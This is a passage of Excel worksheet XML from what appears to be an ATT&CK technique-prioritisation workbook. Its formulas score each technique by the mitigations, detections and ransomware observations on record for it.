        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W326">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X326">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y326">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z326">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA326">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB326">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC326" s="29" t="s">
        <v>1326</v>
      </c>
      <c r="AD326" s="25" t="str" cm="1">
        <f t="array" ref="AD326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE326" s="25">
        <f>IF(AD326="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF326" s="25" t="str" cm="1">
        <f t="array" ref="AF326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC326)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG326" s="25">
        <f>IF(AF326="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH326" s="25" t="str" cm="1">
        <f t="array" ref="AH326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI326" s="25">
        <f>IF(AH326="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ326" s="25" t="str" cm="1">
        <f t="array" ref="AJ326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK326" s="25">
        <f>IF(AJ326="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL326" s="25" t="str" cm="1">
        <f t="array" ref="AL326">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC326)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM326" s="25">
        <f>IF(AL326="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN326" s="60">
        <v>3</v>
      </c>
      <c r="AO326" s="51">
        <v>1</v>
      </c>
      <c r="AP326" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11833333333333335</v>
      </c>
      <c r="AQ326" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1111111111111116E-2</v>
      </c>
      <c r="AR326" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1111111111111116E-2</v>
      </c>
      <c r="AS326" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT326" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU32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27" spans="1:47" ht="32.1">
      <c r="A327" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.4999999999999992E-2</v>
      </c>
      <c r="B327" s="25">
        <f>SUM(H327,M327,V327)*(1+SUM(AE327,AG327,AI327,AK327,AM327))</f>
        <v>0.18333333333333335</v>
      </c>
      <c r="C327" s="25" t="s">
        <v>1327</v>
      </c>
      <c r="D327" s="25" t="s">
        <v>1324</v>
      </c>
      <c r="E327" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F327" s="51">
        <v>0</v>
      </c>
      <c r="G327" s="51">
        <v>1</v>
      </c>
      <c r="H327" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I327">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J327">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K327">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L327">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M327" s="25">
        <v>0</v>
      </c>
      <c r="N327" s="51">
        <v>0</v>
      </c>
      <c r="O327" s="51">
        <v>0</v>
      </c>
      <c r="P327" s="51">
        <v>0</v>
      </c>
      <c r="Q327" s="51">
        <v>0</v>
      </c>
      <c r="R327" s="52" t="s">
        <v>1325</v>
      </c>
      <c r="S327" s="51">
        <v>3</v>
      </c>
      <c r="T327" s="52" t="s">
        <v>1035</v>
      </c>
      <c r="U327" s="51">
        <v>11</v>
      </c>
      <c r="V327" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W327">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X327">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y327">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z327">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA327">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB327">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC327" s="29" t="s">
        <v>1326</v>
      </c>
      <c r="AD327" s="25" t="str" cm="1">
        <f t="array" ref="AD327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE327" s="25">
        <f>IF(AD327="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF327" s="25" t="str" cm="1">
        <f t="array" ref="AF327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC327)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG327" s="25">
        <f>IF(AF327="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH327" s="25" t="str" cm="1">
        <f t="array" ref="AH327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI327" s="25">
        <f>IF(AH327="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ327" s="25" t="str" cm="1">
        <f t="array" ref="AJ327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK327" s="25">
        <f>IF(AJ327="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL327" s="25" t="str" cm="1">
        <f t="array" ref="AL327">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC327)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM327" s="25">
        <f>IF(AL327="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN327" s="60">
        <v>2</v>
      </c>
      <c r="AO327" s="51">
        <v>1</v>
      </c>
      <c r="AP327" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.4999999999999992E-2</v>
      </c>
      <c r="AQ327" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1111111111111116E-2</v>
      </c>
      <c r="AR327" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.1111111111111116E-2</v>
      </c>
      <c r="AS327" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT327" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU32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28" spans="1:47" ht="32.1">
      <c r="A328" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26373333333333332</v>
      </c>
      <c r="B328" s="25">
        <f>SUM(H328,M328,V328)*(1+SUM(AE328,AG328,AI328,AK328,AM328))</f>
        <v>0.30400000000000005</v>
      </c>
      <c r="C328" s="25" t="s">
        <v>1328</v>
      </c>
      <c r="D328" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E328" s="25" t="s">
        <v>1329</v>
      </c>
      <c r="F328" s="51">
        <v>1</v>
      </c>
      <c r="G328" s="51">
        <v>1</v>
      </c>
      <c r="H328" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I328">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J328">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K328">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L328">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M328" s="25">
        <v>0</v>
      </c>
      <c r="N328" s="51">
        <v>3</v>
      </c>
      <c r="O328" s="51">
        <v>13</v>
      </c>
      <c r="P328" s="51">
        <v>9</v>
      </c>
      <c r="Q328" s="51">
        <v>2</v>
      </c>
      <c r="R328" s="51"/>
      <c r="S328" s="51">
        <v>0</v>
      </c>
      <c r="T328" s="51"/>
      <c r="U328" s="51">
        <v>0</v>
      </c>
      <c r="V328" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142859</v>
      </c>
      <c r="W328">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X328">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y328">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z328">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>27</v>
      </c>
      <c r="AA328">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.27</v>
      </c>
      <c r="AB328">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.27</v>
      </c>
      <c r="AC328" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD328" s="25" t="str" cm="1">
        <f t="array" ref="AD328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC328)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE328" s="25">
        <f>IF(AD328="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF328" s="25" t="str" cm="1">
        <f t="array" ref="AF328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG328" s="25">
        <f>IF(AF328="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH328" s="25" t="str" cm="1">
        <f t="array" ref="AH328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC328)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI328" s="25">
        <f>IF(AH328="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ328" s="25" t="str" cm="1">
        <f t="array" ref="AJ328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK328" s="25">
        <f>IF(AJ328="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL328" s="25" t="str" cm="1">
        <f t="array" ref="AL328">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC328)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM328" s="25">
        <f>IF(AL328="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN328" s="60">
        <v>7</v>
      </c>
      <c r="AO328" s="51">
        <v>1</v>
      </c>
      <c r="AP328" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26373333333333332</v>
      </c>
      <c r="AQ328" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10133333333333334</v>
      </c>
      <c r="AR328" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10133333333333334</v>
      </c>
      <c r="AS328" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT328" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU32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29" spans="1:47">
      <c r="A329" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9207619047619051E-2</v>
      </c>
      <c r="B329" s="25">
        <f>SUM(H329,M329,V329)*(1+SUM(AE329,AG329,AI329,AK329,AM329))</f>
        <v>0.25874285714285722</v>
      </c>
      <c r="C329" s="25" t="s">
        <v>1330</v>
      </c>
      <c r="D329" s="25" t="s">
        <v>309</v>
      </c>
      <c r="E329" s="25" t="s">
        <v>1331</v>
      </c>
      <c r="F329" s="51">
        <v>1</v>
      </c>
      <c r="G329" s="51">
        <v>1</v>
      </c>
      <c r="H329" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I329">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J329">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K329">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L329">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M329" s="25">
        <v>0</v>
      </c>
      <c r="N329" s="51">
        <v>3</v>
      </c>
      <c r="O329" s="51">
        <v>5</v>
      </c>
      <c r="P329" s="51">
        <v>1</v>
      </c>
      <c r="Q329" s="51">
        <v>18</v>
      </c>
      <c r="R329" s="51"/>
      <c r="S329" s="51">
        <v>0</v>
      </c>
      <c r="T329" s="51"/>
      <c r="U329" s="51">
        <v>0</v>
      </c>
      <c r="V329" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142859</v>
      </c>
      <c r="W329">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X329">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y329">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z329">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>27</v>
      </c>
      <c r="AA329">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.27</v>
      </c>
      <c r="AB329">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.27</v>
      </c>
      <c r="AC329" s="29" t="s">
        <v>1332</v>
      </c>
      <c r="AD329" s="25" t="str" cm="1">
        <f t="array" ref="AD329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE329" s="25">
        <f>IF(AD329="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF329" s="25" t="str" cm="1">
        <f t="array" ref="AF329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG329" s="25">
        <f>IF(AF329="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH329" s="25" t="str" cm="1">
        <f t="array" ref="AH329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC329)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI329" s="25">
        <f>IF(AH329="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ329" s="25" t="str" cm="1">
        <f t="array" ref="AJ329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK329" s="25">
        <f>IF(AJ329="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL329" s="25" t="str" cm="1">
        <f t="array" ref="AL329">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC329)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM329" s="25">
        <f>IF(AL329="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN329" s="52">
        <v>1</v>
      </c>
      <c r="AO329" s="51">
        <v>0</v>
      </c>
      <c r="AP329" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9207619047619051E-2</v>
      </c>
      <c r="AQ329" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.6247619047619073E-2</v>
      </c>
      <c r="AR329" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.6247619047619073E-2</v>
      </c>
      <c r="AS329" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT329" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU32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30" spans="1:47" ht="48">
      <c r="A330" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.0400000000000003E-2</v>
      </c>
      <c r="B330" s="25">
        <f>SUM(H330,M330,V330)*(1+SUM(AE330,AG330,AI330,AK330,AM330))</f>
        <v>0.30400000000000005</v>
      </c>
      <c r="C330" s="25" t="s">
        <v>1333</v>
      </c>
      <c r="D330" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E330" s="25" t="s">
        <v>1334</v>
      </c>
      <c r="F330" s="51">
        <v>1</v>
      </c>
      <c r="G330" s="51">
        <v>1</v>
      </c>
      <c r="H330" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I330">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J330">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K330">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L330">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M330" s="25">
        <v>0</v>
      </c>
      <c r="N330" s="51">
        <v>0</v>
      </c>
      <c r="O330" s="51">
        <v>1</v>
      </c>
      <c r="P330" s="51">
        <v>0</v>
      </c>
      <c r="Q330" s="51">
        <v>0</v>
      </c>
      <c r="R330" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S330" s="51">
        <v>3</v>
      </c>
      <c r="T330" s="51" t="s">
        <v>1335</v>
      </c>
      <c r="U330" s="51">
        <v>10</v>
      </c>
      <c r="V330" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12857142857142859</v>
      </c>
      <c r="W330">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X330">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y330">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z330">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA330">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB330">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC330" s="29" t="s">
        <v>1336</v>
      </c>
      <c r="AD330" s="25" t="str" cm="1">
        <f t="array" ref="AD330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC330)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE330" s="25">
        <f>IF(AD330="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF330" s="25" t="str" cm="1">
        <f t="array" ref="AF330">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC330)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG330" s="25">
        <f>IF(AF330="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH330" s="25" t="str" cm="1">
